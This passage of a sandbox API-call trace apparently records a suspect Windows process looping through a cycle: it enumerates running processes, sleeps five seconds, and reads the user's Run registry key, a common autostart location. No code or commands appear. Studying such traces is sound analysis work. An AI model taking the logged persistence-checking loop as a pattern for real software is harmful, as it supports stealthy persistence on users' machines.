[0180.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.021] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.114] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.115] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.115] NtClose (Handle=0x274) returned 0x0 [0180.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.116] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.125] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.126] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.126] NtClose (Handle=0x274) returned 0x0 [0180.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.134] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.136] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.137] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.137] NtClose (Handle=0x274) returned 0x0 [0180.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.144] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.145] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.146] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.146] NtClose (Handle=0x274) returned 0x0 [0180.147] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.156] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.157] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.157] NtClose (Handle=0x274) returned 0x0 [0180.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.160] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.164] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.165] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.166] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.168] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.168] NtClose (Handle=0x274) returned 0x0 [0180.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.174] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.182] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.183] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.183] NtClose (Handle=0x274) returned 0x0 [0180.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.192] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.193] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.194] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.194] NtClose (Handle=0x274) returned 0x0 [0180.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.206] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.207] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.207] NtClose (Handle=0x274) returned 0x0 [0180.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.209] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.209] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.216] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.217] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.217] NtClose (Handle=0x274) returned 0x0 [0180.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.225] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.226] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.226] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.226] NtClose (Handle=0x274) returned 0x0 [0180.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.236] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.237] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.239] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.239] NtClose (Handle=0x274) returned 0x0 [0180.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.250] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.251] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.252] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.252] NtClose (Handle=0x274) returned 0x0 [0180.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.262] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.263] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, 